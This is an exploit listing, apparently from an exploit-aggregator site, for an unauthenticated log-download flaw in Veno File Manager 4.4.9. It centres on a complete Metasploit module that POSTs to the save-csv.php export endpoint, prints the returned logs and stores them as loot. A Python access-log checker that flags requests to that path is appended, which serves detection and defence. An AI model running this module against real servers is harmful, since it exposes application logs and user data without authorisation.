## https://sploitus.com/exploit?id=PACKETSTORM:223853
    ==================================================================================================================================
    | # Title     : Veno File Manager 4.4.9 Unauthenticated Logs Download                                                            |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : https://veno.es/updates/logs/?slug=vfm/                                                                          |
    ==================================================================================================================================
    
    [+] Summary    : This module allows unauthenticated attackers to download application logs from Veno File Manager 4.4.9 by exploiting the save-csv.php endpoint.
    
    [+] PoC        :
    
    ##
    # Module for Unauthenticated Logs Download
    ##
    class MetasploitModule < Msf::Auxiliary
      include Msf::Exploit::Remote::HttpClient
      include Msf::Auxiliary::Scanner
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Veno File Manager 4.4.9 - Unauthenticated Logs Download',
            'Description' => %q{
              This module allows unauthenticated attackers to download application logs
              from Veno File Manager 4.4.9 by exploiting the save-csv.php endpoint.
            },
            'Author' => ['indoushka'],
            'License' => MSF_LICENSE,
            'References' => [
              ['CVE', '2026-37070'],
              ['URL', 'https://github.com/jfs-jfs/CVE-2026-37070']
            ]
          )
        )
    
        register_options([
          OptString.new('TARGETURI', [true, 'Base path', '/']),
          OptString.new('START_DATE', [true, 'Start date (YYYY-MM-DD)', '2024-01-01'])
        ])
      end
    
      # The Scanner mixin provides run() itself and calls run_host(ip) once per
      # target, so the per-host logic belongs here rather than in an overriding run().
      def run_host(ip)
        print_status("Downloading logs from #{datastore['START_DATE']}")
        # CSV export endpoint of the admin panel's analytics view
        target_url = normalize_uri(target_uri.path, 'vfm-admin', 'admin-panel', 'view', 'analytics', 'save-csv.php')
        res = send_request_cgi({
          'method' => 'POST',
          'uri' => target_url,
          'vars_post' => {
            'logsince' => datastore['START_DATE'],
            'loguntil' => '3000-12-31'
          }
        })
        if res && res.code == 200 && !res.body.empty?
          print_good("Logs downloaded successfully!")
          print_line(res.body)
          # Keep the returned CSV in the framework's loot store for this host
          store_loot(
            'vfm.logs',
            'text/csv',
            ip,
            res.body,
            "vfm_logs_#{datastore['START_DATE']}.csv",
            "VFM Logs from #{datastore['START_DATE']}"
          )
        else
          print_error("Failed to download logs")
        end
      end
    end
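Defender-side companion, added here and not part of the advisory or of the VFM project: a small Python checker over web-server access logs that flags every request to the save-csv.php export path named above. The POST parameters never reach the access log, so the check keys on path, status and response size; the log lines and the "combined" log regex are constructed samples, and the severity labels are an assumption of this example.

```python
import re
from dataclasses import dataclass

# Export endpoint named in the advisory; matched as a suffix so any install base path is covered.
VULN_PATH = "/vfm-admin/admin-panel/view/analytics/save-csv.php"

# Apache/nginx "combined" access-log line (standard field order; regex written for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

@dataclass
class Finding:
    ip: str
    ts: str
    method: str
    status: int
    size: int
    severity: str

def scan_access_log(lines):
    """One Finding per request to the VFM log-export endpoint: a 200 with a
    non-empty body means a CSV was served ("high"); anything else is "low"."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]
        if not path.endswith(VULN_PATH):
            continue
        status = int(m.group("status"))
        size = 0 if m.group("size") == "-" else int(m.group("size"))
        severity = "high" if status == 200 and size > 0 else "low"
        findings.append(Finding(m.group("ip"), m.group("ts"), m.group("method"), status, size, severity))
    return findings

# Constructed sample lines (not real traffic); RFC 5737 documentation addresses.
SAMPLE_LOG = [
    '198.51.100.7 - - [03/Mar/2026:10:15:01 +0000] "GET /vfm-admin/ HTTP/1.1" 200 1130 "-" "curl/8.5.0"',
    '198.51.100.7 - - [03/Mar/2026:10:15:02 +0000] "POST /vfm-admin/admin-panel/view/analytics/save-csv.php HTTP/1.1" 200 48213 "-" "curl/8.5.0"',
    '203.0.113.9 - - [03/Mar/2026:11:02:44 +0000] "POST /files/vfm-admin/admin-panel/view/analytics/save-csv.php HTTP/1.1" 403 199 "-" "python-requests/2.31"',
    '192.0.2.1 - - [03/Mar/2026:11:05:10 +0000] "GET /vfm-admin/admin-panel/view/analytics/save-csv.php?x=1 HTTP/1.1" 302 - "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f.severity:4} {f.ip:15} {f.ts} {f.method} status={f.status} bytes={f.size}")
```

Until the endpoint enforces authentication, a "high" hit from an address that never logged in to the admin panel is the signal to treat the exported logs as disclosed.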
    
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================